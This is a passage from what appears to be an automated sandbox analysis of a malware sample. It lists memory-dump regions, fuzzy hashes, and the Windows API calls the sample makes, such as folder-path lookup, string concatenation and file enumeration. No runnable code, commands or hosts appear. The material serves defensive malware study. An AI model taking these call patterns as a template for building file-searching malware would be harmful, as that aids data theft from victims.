                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: 6e31a977a1dcc6fe080f43f0bf5bab951a9859a0b5483a78906795015ec1d73c
                                • Instruction ID: b4e8ba5461506bd745da8803f3b7fba3d2ca3b472570b6c8cf20971e5710362d
                                • Opcode Fuzzy Hash: 6e31a977a1dcc6fe080f43f0bf5bab951a9859a0b5483a78906795015ec1d73c
                                • Instruction Fuzzy Hash: 27F01975E40208ABDB10DBF1DC49FAEB7B9FB58710F108698F655EB2C0D670A6028F40
                                APIs
                                • __getptd.LIBCMT ref: 008CC74E
                                  • Part of subcall function 008CBF9F: __amsg_exit.LIBCMT ref: 008CBFAF
                                • __getptd.LIBCMT ref: 008CC765
                                • __amsg_exit.LIBCMT ref: 008CC773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 008CC797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: ee82340b7262c732c8d2041f02bf154cc95d6a490564fbb06772ab638b841937
                                • Instruction ID: 3f9ca720bb0b02eb09f16891c69be23159009ba61f7db26fc7fe968800174589
                                • Opcode Fuzzy Hash: ee82340b7262c732c8d2041f02bf154cc95d6a490564fbb06772ab638b841937
                                • Instruction Fuzzy Hash: 17F04432905A149AEB25BBAC9807F5A33B0FB00724F21424EF418EA2D2CF74D9409A5B
                                APIs
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4F7A
                                • lstrcat.KERNEL32(?,008D1070), ref: 008C4F97
                                • lstrcat.KERNEL32(?,007B8938), ref: 008C4FAB
                                • lstrcat.KERNEL32(?,008D1074), ref: 008C4FBD
                                  • Part of subcall function 008C4910: wsprintfA.USER32 ref: 008C492C
                                  • Part of subcall function 008C4910: FindFirstFileA.KERNEL32(?,?), ref: 008C4943
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D0FDC), ref: 008C4971
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D0FE0), ref: 008C4987
                                  • Part of subcall function 008C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008C4B7D
                                  • Part of subcall function 008C4910: FindClose.KERNEL32(000000FF), ref: 008C4B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 17efd5296e5d69fa4e7700dc3bd94ab1a55f340b3cef20972e622509549017a3
                                • Instruction ID: bee18184bd9752c1fa87522528d7a1c5d330ab2372e57fde17f8d4a8bb606c34
                                • Opcode Fuzzy Hash: 17efd5296e5d69fa4e7700dc3bd94ab1a55f340b3cef20972e622509549017a3
                                • Instruction Fuzzy Hash: 7A2195B6900208A7CB54F7E4DC46FE9333CFB64340F004558B65AD6281EE74AAC9CBA3